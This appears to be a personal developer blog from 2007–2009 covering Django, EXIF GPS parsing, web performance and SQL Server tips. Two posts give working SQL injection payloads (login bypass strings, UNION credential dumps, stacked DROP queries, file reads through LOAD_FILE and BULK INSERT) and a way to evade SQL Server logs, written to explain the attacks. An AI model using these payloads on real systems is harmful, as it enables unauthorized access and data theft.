Tuesday, April 28, 2009

Halve your site's page sizes in 5 minutes

This reduces our page sizes by up to 50%+

from django.utils.html import strip_spaces_between_tags
from django.conf import settings

class SpacelessMiddleware(object):
def process_response(self, request, response):
if not settings.DEBUG:
if 'text/html' in response['Content-Type']:
response.content = strip_spaces_between_tags(response.content)
return response

Tuesday, March 03, 2009

I havent had to worry about SQL recently


I'm happy django does all the database work for me so i can spend my time building features and writing the same snippets of code all over the application.

Tuesday, January 08, 2008

Python + PIL: Make Geotagged photos from EXIF Headers

For my django app, i wanted to take geotagged images and display them on google maps. Geotagged images store GPS data in the EXIF headers of the image, so we'll want to grab this data and extract the lattitude and longitude so we can display where the image was taken in our mapping software.

Using the PIL library we can grab the GPS data out of the image and format it in a way to easily display on a google map. PIL really does all the work for us, all we have to do is convert the Lat/Lng from DDD°, MM', SS.S" format stored in image to DD.DDDDD° format that google uses

Hidden in the Exif data we see this:

34853: {0: (2, 0, 0, 0), 1: 'N', 2: ((40, 1), (37, 1), (279, 10)), 3: 'W', 4: ((74, 1), (8, 1), (373, 10)), 5: 0, 6: (0, 1), 7: ((18, 1), (58, 1), (19, 1)), 9: 'A', 18: 'WGS-84'}


We can then use the following python to extract the data, convert and save it to our photo object
from PIL import Image
from PIL.ExifTags import TAGS

i = Image.open('/pics/DSC07018.JPG')
info = i._getexif()

ret = {}
for tag,value in info.items():
decoded = TAGS.get(tag, tag)
ret[decoded] = value

Nsec = ret['GPSInfo'][2][2][0] / float(ret['GPSInfo'][2][2][1])
Nmin = ret['GPSInfo'][2][1][0] / float(ret['GPSInfo'][2][1][1])
Ndeg = ret['GPSInfo'][2][0][0] / float(ret['GPSInfo'][2][0][1])
Wsec = ret['GPSInfo'][4][2][0] / float(ret['GPSInfo'][4][2][1])
Wmin = ret['GPSInfo'][4][1][0] / float(ret['GPSInfo'][4][1][1])
Wdeg = ret['GPSInfo'][4][0][0] / float(ret['GPSInfo'][4][0][1])

if ret['GPSInfo'][1] == 'N':
Nmult = 1
else:
Nmult = -1

if ret['GPSInfo'][1] == 'E':
Wmult = 1
else:
Wmult = -1

Lat = Nmult * (Ndeg + (Nmin + Nsec/60.0)/60.0)
Lng = Wmult * (Wdeg + (Wmin + Wsec/60.0)/60.0)

Now that you have the Lat and Lng you can save to your model or class to easily display in your web app.

photo= GMapPhoto()
photo.image = i
photo.lattitude = Lat
photo.longitude = Lng
photo.save()

Monday, December 17, 2007

Make your website faster in 5 minutes

The "speed" or "performance" of your website is only based on one thing: how long it takes from when your user clicks until the data gets from your servers to the eyeballs of your user. Some companies can spend hundreds of hours and millions of dollars tuning queries, to shave off 20% of a 5ms query, but at the end of the day all that matters is your application's response time as perceived by the end user.

For most websites I'd say 2% of the time is spent in the database, 20% in the app code, 10-20% in transfer or latency, while the rest is spent or wasted on the front end. If i was going to spend the least amount of time/money to increase the most performance, I would focus on the front end of the application. Specifically, on how the browser requests, caches and renders data.

You're end user shouldn't have to wait around for stuff he doesn't need. Theres no point in hitting the webserver again and again requesting the same exact media files (css/javascript/images). These dont change so its a waste of processing power and bandwidth to server them. In order to prevent the user's browser you have to explain that their local cache shouldn't expire instantly. Set far future expires headers on your static content and you wont have to server it again and again. Doing this is trivial in either Apache of IIS

ExpiresActive On
ExpiresDefault "access plus 1 month"
This is what i have set on my static content server, if you're using the same webserver to serve up dynamic content, you probably want to specify expires header by type instead
ExpiresByType image/gif A2592000
ExpiresByType image/png A2592000
ExpiresByType image/jpg A2592000
ExpiresByType image/jpeg A2592000
ExpiresByType application/x-javascript A2592000
ExpiresByType text/css A2592000
You might have just reduced your bandwidth and response time by 20%. Additionally, read up on ETags and why they should be configured correctly. Probably just do this
FileETag none
Obviously, you want to send as little data as possible out of your webserver. Reducing file sizes and using common css/js files are pretty obvious performance techniques. What you might also want to do is compress text files as they are sent form your webserver; modern browsers can decode GZip'ed data at the small expense of processing power. To enable apache webserver to send gzip content use mod_deflate
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript
In my experience this seems to reduce the size of html/js/css files by 60% or more. Obviously this will reduce the transfer time of your content.

Finally, understand how browsers render web pages. Any time JavaScript is run, the browser will block page rendering. This is because JavaScript is able to write out data to the page. If you load all your JavaScript in the , your page won't start rendering on the client until it has all been transfered and loaded on the browser. Additionally you probably want to load all of your CSS as soon as possible; that way you can get required images as soon as possible if needed. A good rule of thumb:

Put your CSS at the top of the page
Put your JavaScript at the bottom of the page


On a side note, Django rocks and mootools rocks

Tuesday, November 06, 2007

The Fine Art of Software Estimation

Overheard at Social Sample:

"by the way 25-30 hours really means 60 hours"

"I'm just taking all estimates and doubling them now...even if people have already doubled them, i'm doing it again; blanket policy"
Maybe we need some Evidence Based Estimation

Friday, November 02, 2007

Metallica Fans Don't Support Hilary Clinton

What happens when you take a giant database full of social data and do some light data-mining and statistics: lots of random facts! (arguable worthless or priceless depending on what you use them for).

I am spending my Friday at Social Sample analyzing social data from supporters of 2008 presidential candidates; data found on online social networks. After coming up with some basic demographics, I searched the user base for music interests with high correlations to the normal population. A similar algorithm to what powers Social Suggester. I found that the artists / bands with the highest correlation to Hillary Clinton supporters were:

"MADONNA"
"TORI AMOS"
"FIONA APPLE"
"BJORK"
"PRINCE"
"DEPECHE MODE"
"GWEN STEFANI"
"PORTISHEAD"
"THE SMITHS"
"ELTON JOHN"
"NO DOUBT"
"KELLY CLARKSON"
"MILES DAVIS"
"THE CURE"
"JUSTIN TIMBERLAKE"
Hmm Interesting. Now what happens if you change the Social Suggester ranking algorithm to find the bands/artists with the lowest correlation between these two data sets?

"ATREYU"
"THE USED"
"MUDVAYNE"
"SLIPKNOT"
"TAKING BACK SUNDAY"
"BREAKING BENJAMIN"
"YELLOWCARD"
"DISTURBED"
"HINDER"
"BLINK 182"
"PANTERA"
"50 CENT"
"STAIND"
"METALLICA"
"SYSTEM OF A DOWN"

Also Interesting. These correlations weren't extremely high, but Hillary Clinton supporters that use online social networks were 4x less likely to be a fan of 50 Cent, and 5x less likely to be a fan of Breaking Benjamin. I'm not going to make any assumptions about what kind of people support Hillary Clinton, all we can say is that there a high correlation between the types of people who enjoy the first set of artists/bands, and a low correlation between the second. If anyone reads this please feel free to share any insight; please let me know if there are any other subcultures you'd like to see info on. I'll leave with some random data about Hillary Clinton supporters, (these are not facts [read: please dont sue me], just the data that our engine spat out based on analysis of the target group). Enjoy.

Interesting differences (all compared to the normal population, sample size =10.5 Million, all statistically significant)

Supporters were no more likely to be Female
Supporters were 10.9x more likely to be gay
Supporters were 1.25x more likely to be married
Supporters were 1.25x more likely to be a parent
Supporters were 1.50x more likely to be in grad school

Supporters were 2.01x more likely to be Agnostic
Supporters were 1.9x more likely to be Jewish
Supporters were 2.50x less likely to be Muslim
Supporters were 1.12x less likely to be Catholic

The same proportion of supporters Smoke cigarettes, but they are 1.1x less likely to drink alcohol


Find other high correlations at Social Suggester, or contact me for something specific. evan at socialsample . com

Wednesday, October 03, 2007

A cool way to alias columns

A cool way to alias columns, dunno how useful this is, but kinda cool


Select t.alpha, t.beta, t.gamma
FROM(SELECT 11,22,33)t(alpha,beta,gamma)

Monday, September 24, 2007

SQL Server Log Bypass

SQL Server (in)conveniently doesn't log queries which have sp_password in it (so the passwords don't show up in the logs).

This means that someone trying to break into your database using SQL injection can tack on "--sp_password" to the end of all their queries to avoid leaving a trail in the DB logs.

Of course all the requests will be stored in the web server log. Unless of course you use POST instead of GET

Sunday, September 23, 2007

Why you should use stored procedures. aka How to do SQL Injection.

Use stored procedures. Don't let people choose the queries that are being run on your database or you might open yourself up to a lot of harm. Any novice database user can turn your simple web app into an unrestricted interface to your database and/or server. Below are some common examples showing how hackers exploit your code to damage your database or access restricted data

1. Commenting out code / Login Bypass
A typical line of code that checks authentication based on a user name and password

SELECT * FROM members WHERE username = '$username' AND password = '$password'
What gets run on your database here if someone enters in their username as " admin'-- " with no password?

SELECT * FROM members WHERE username = 'admin '--' AND password = ''


unless your escaping string termination (single quotes here) the user was just able to bypass authentication as an arbitrary user.


2. Stacked Queries
Depending on the database driver and the database being used, multiple sql queries can be run in the same batch. This allows hackers to stack on arbitrary sql at the end of a normal query
SELECT * FROM products WHERE id = $id
This query might grab the product id out of the query string and then run this query. but if this hacker changes the query string and forces a non integer string such as "10;

SELECT * FROM products WHERE id = 10;
Drop products;

Probably not what you want your view product page to do.

3. UNION Injections: Forcing data out of the database

Imagine a page like this

http://somesite.com/viewproducts?productype=1

which grabs product names from a database which has a certain product type by executing this code and sql

SELECT productname FROM products WHERE type = $productypeid

for each productName in productNameResult

echo productName + "
"


Normally this pseudocode would output all the product names. However if the hacker changes the query string around they can turn your view products page into an easy interface to the data. Imagine the hacker massaged the querystring a tiny bit and changed the producttypeid parameter to be "1 and 1=0 union select username + '-' + password as productname from users_tbl " This would yield the following SQL
SELECT productname FROM products WHERE type = 1 and 1=0 union select username + '-' + password as productname from users_tbl

the end result is a dump of all the username / password on your view products page

username1-password1
username2-password2
username3-password3

4. Avoiding Anti-SQL Injection

You might think that an easy fix to this would be to just check for single quotes and escape them. However there are a bunch of ways to enter strings without quotes. For example in MySQL this will dump out the file C:\boot.ini

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Hackers will commonly concatonate strings together using database

SELECT CHAR(75)+CHAR(76)+CHAR(77
5. Bypassing Logins and Authentication
Unfortunately most ametuer sites will break or bypass authenticaiton if you try some of these usernames:
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • Or to logon as a diff user:
    • ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
More advanced sites might try MD5 Password hash checks, these can be bypassed as well

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

6. Leveraging Error Messages
In SQL Server a hacker can use the Having clause to figure out what columns are being selected in the query they are trying to hack by entering the following fields in order.
  • ' HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1 HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
  • If you are not getting any more error then it's done.
If the hacker is trying to do UNION SQL injection knowing the number of columns will help them greatly; they can use the order by clause to do this:
  • ORDER BY 1--
  • ORDER BY 2--
  • ORDER BY N-- so on
  • Keep going until get an error. Error means you found the number of selected columns.

7. Figuring out Column Types
If a hacker is trying to do UNION injection they'll have to know what types each of the columns are. Since datatype errors appear before union target errors, the hacker can easily figure this out by using aggregate or convert functions.

'union select sum(columntofind) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
Error! – Third column is not an integer.
...Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.
8. Inserting Arbitrary Data
A hacker can use SQL injection to create an account to your app
; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

9. Figuring out database type

@@version is a hackers friend (at least in MySQL and SQL Server)
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
10. Bulk Inserts to pull data off the server

Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

    1. Create table foo( line varchar(8000) )
    2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
    3. Drop temp table, and repeat for another file.

Friday, July 27, 2007

Persitant Logging through Aborted Transactions

Sometimes you want to log that a transaction failed when the transaction is aborted. This can be a problem when the logging is part of the rolled-back transaction.


CREATE TABLE TranLogging (id int)
CREATE TABLE Test (id int)
CREATE TABLE #Test (id int)
DECLARE @TranLogging table (id int)

BEGIN TRAN
INSERT INTO @TranLogging VALUES(1)
INSERT INTO Test VALUES(1)
INSERT INTO #Test VALUES(1)
ROLLBACK TRAN

SELECT '@TranLogging',COUNT(*) FROM @TranLogging
SELECT ' test',COUNT(*) FROM Test
SELECT '#test',COUNT(*) FROM #Test

insert into TranLogging
select * from @TranLogging

select * from TranLogging

DROP TABLE Test,#Test,TranLogging


You'll notice that the row inserted into the table variable was maintained after the rollback, you can use this after a rolled-back transaction to copy failures/abortions into a more persistent logging table.